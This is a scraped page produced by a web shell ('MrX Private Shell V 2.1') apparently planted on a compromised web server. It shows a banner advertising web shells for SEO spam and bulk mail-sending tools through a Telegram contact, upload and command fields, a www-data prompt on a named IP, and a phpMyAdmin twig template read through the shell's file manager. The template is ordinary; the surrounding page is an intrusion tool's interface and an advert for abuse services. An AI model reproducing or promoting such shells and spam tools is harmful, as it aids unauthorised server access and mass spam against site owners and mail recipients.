__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<tr>
  <td class="dragHandle">
    <span class="ui-icon ui-icon-arrowthick-2-n-s"></span>
  </td>
  <td class="routine_direction_cell{{ class }}">
    <select name="item_param_dir[{{ index }}]">
      {% for value in param_directions %}
        <option value="{{ value }}"{{ item_param_dir == value ? ' selected' }}>{{ value }}</option>
      {% endfor %}
    </select>
  </td>
  <td>
    <input name="item_param_name[{{ index }}]" type="text" value="{{ item_param_name|raw }}">
  </td>
  <td>
    <select name="item_param_type[{{ index }}]">
      {{ supported_datatypes|raw }}
    </select>
  </td>
  <td>
    <input id="item_param_length_{{ index }}" name="item_param_length[{{ index }}]" type="text" value="{{ item_param_length|raw }}">
    <div class="enum_hint">
      <a href="#" class="open_enum_editor">
        {{ get_image('b_edit', '', {'title': 'ENUM/SET editor'|trans}) }}
      </a>
    </div>
  </td>
  <td class="hide no_len">---</td>
  <td class="routine_param_opts_text">
    <select lang="en" dir="ltr" name="item_param_opts_text[{{ index }}]">
      <option value="">{% trans 'Charset' %}</option>
      <option value=""></option>
      {% for charset in charsets %}
        <option value="{{ charset.name }}" title="{{ charset.description }}"{{ charset.is_selected ? ' selected' }}>
          {{- charset.name -}}
        </option>
      {% endfor %}
    </select>
  </td>
  <td class="hide no_opts">---</td>
  <td class="routine_param_opts_num">
    <select name="item_param_opts_num[{{ index }}]">
      <option value=""></option>
      {% for value in param_opts_num %}
        <option value="{{ value }}"{{ item_param_opts_num == value ? ' selected' }}>{{ value }}</option>
      {% endfor %}
    </select>
  </td>
  <td class="routine_param_remove{{ drop_class }}">
    <a href="#" class="routine_param_remove_anchor">
      {{ get_icon('b_drop', 'Drop'|trans) }}
    </a>
  </td>
</tr>

Filemanager

Name Type Size Permission Actions
editor_form.twig File 7.42 KB 0644
execute_form.twig File 2.73 KB 0644
index.twig File 2.45 KB 0644
parameter_row.twig File 1.87 KB 0644
row.twig File 2.37 KB 0644
Filemanager